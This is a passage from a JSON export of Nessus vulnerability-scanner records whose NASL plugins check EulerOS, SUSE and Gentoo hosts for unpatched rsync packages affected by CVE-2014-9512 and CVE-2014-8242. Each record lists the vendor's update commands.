introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-2444\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?5a206b17\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rsync package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"rsync-3.0.9-15.h11\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T15:07:59", "description": "According to the version of the rsync package installed, the EulerOS installation on the remote host is affected by the following vulnerability :\n\n - rsync 3.1.1 allows remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path.(CVE-2014-9512)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2021-04-30T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : rsync (EulerOS-SA-2021-1844)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2021-05-04T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:rsync", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2021-1844.NASL", "href": "https://www.tenable.com/plugins/nessus/149112", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149112);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/05/04\");\n\n script_cve_id(\n \"CVE-2014-9512\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : rsync (EulerOS-SA-2021-1844)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the rsync package installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - rsync 3.1.1 allows remote attackers to write to\n arbitrary files via a symlink attack on a file in the\n synchronization path.(CVE-2014-9512)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2021-1844\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?40163b00\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected rsync package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/04/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"rsync-3.0.9-15.h11\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-20T16:09:46", "description": "rsync was updated to fix one security issue.\n\n - CVE-2014-9512: rsync allowed remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path (bsc#915410).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-09-02T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : rsync (SUSE-SU-2016:2151-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:rsync", "p-cpe:/a:novell:suse_linux:rsync-debuginfo", "p-cpe:/a:novell:suse_linux:rsync-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2016-2151-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93307", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:2151-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93307);\n script_version(\"2.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-9512\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : rsync (SUSE-SU-2016:2151-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"rsync was updated to fix one security issue.\n\n - CVE-2014-9512: rsync allowed remote attackers to write\n to arbitrary files via a symlink attack on a file in the\n synchronization path (bsc#915410).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9512/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20162151-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?65cdcf6b\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1267=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1267=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rsync-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rsync-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"rsync-3.1.0-9.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"rsync-debuginfo-3.1.0-9.3\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"rsync-debugsource-3.1.0-9.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"rsync-3.1.0-9.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"rsync-debuginfo-3.1.0-9.3\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"rsync-debugsource-3.1.0-9.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:52:44", "description": "rsync was updated to fix one security issue.\n\n - CVE-2014-9512: rsync allowed remote attackers to write to arbitrary files via a symlink attack on a file in the synchronization path (bsc#915410).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-29T00:00:00", "type": "nessus", "title": "SUSE SLES11 Security Update : rsync (SUSE-SU-2016:1866-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9512"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:rsync", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-1866-1.NASL", "href": "https://www.tenable.com/plugins/nessus/93183", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1866-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93183);\n script_version(\"2.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-9512\");\n\n script_name(english:\"SUSE SLES11 Security Update : rsync (SUSE-SU-2016:1866-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"rsync was updated to fix one security issue.\n\n - CVE-2014-9512: rsync allowed remote attackers to write\n to arbitrary files via a symlink attack on a file in the\n synchronization path (bsc#915410).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9512/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20161866-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?79822e53\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server 11-SP4:zypper in -t patch\nslessp4-rsync-12664=1\n\nSUSE Linux Enterprise Debuginfo 11-SP4:zypper in -t patch\ndbgsp4-rsync-12664=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/02/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES11)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES11\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES11\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES11 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES11\", sp:\"4\", reference:\"rsync-3.0.4-2.52.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-24T15:03:45", "description": "The remote host is affected by the vulnerability described in GLSA-201605-04 (rsync: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in rsync. Please review the CVE identifiers referenced below for details.\n Impact :\n\n Remote attackers could write arbitrary files via symlink attacks.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2016-05-31T00:00:00", "type": "nessus", "title": "GLSA-201605-04 : rsync: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8242", "CVE-2014-9512"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:rsync", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201605-04.NASL", "href": "https://www.tenable.com/plugins/nessus/91377", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201605-04.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(91377);\n script_version(\"2.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-8242\", \"CVE-2014-9512\");\n script_xref(name:\"GLSA\", value:\"201605-04\");\n\n script_name(english:\"GLSA-201605-04 : rsync: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201605-04\n(rsync: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in rsync. Please review\n the CVE identifiers referenced below for details.\n \nImpact :\n\n Remote attackers could write arbitrary files via symlink attacks.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201605-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All rsync users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=net-misc/rsync-3.1.2'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:rsync\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/rsync\", unaffected:make_list(\"ge 3.1.2\"), vulnerable:make_list(\"lt 3.1.2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"rsync\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-11-25T14:33:02", "description": "This update for rsync fixes two security issues :\n\n - CVE-2014-8242: Checksum collisions leading to a denial of service (bsc#900914)\n\n - CVE-2014-9512: Malicious servers could send files outside of the transferred directory (bsc#915410)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-01-20T00:00:00", "type": "nessus", "title": "SUSE SLED11 / SLES11 Security Update : rsync (SUSE-SU-2016:0176-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-8242", "CVE-2014-9512"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:rsync", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_SU-2016-0176-1.NASL", "href": "https://www.tenable.com/plugins/nessus/88009", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:0176-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88009);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-8242\", \"CVE-2014-9512\");\n script_bugtraq_id(74366);\n\n script_name(english:\"SUSE SLED11 / SLES11 Security Update : rsync (SUSE-SU-2016:0176-1)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for rsync fixes two security issues :\n\n - CVE-2014-8242: Checksum collisions leading to a denial\n of service (bsc#900914)\n\n - CVE-2014-9512: Malicious servers could send files\n outside of the transferred directory (bsc#915410)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=900914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915410\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-8242/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9512/\"\n );\n # https://www.suse.com/support/update/announcement/2016/suse-su-20160176-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d096cf6d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for VMWare 11-SP3 :\n\nzypper in -t patch slessp3-rsync-12344=1\n\nSUSE Linux Enterprise Server 11-SP4 :\n\nzypper in -t patch slessp4-rsync-12344=1\n\nSUSE Linux Enterprise Server 11-SP3 :\n\nzypper in -t patch slessp3-rsync-12344=1\n\nSUSE Linux Enterprise Desktop 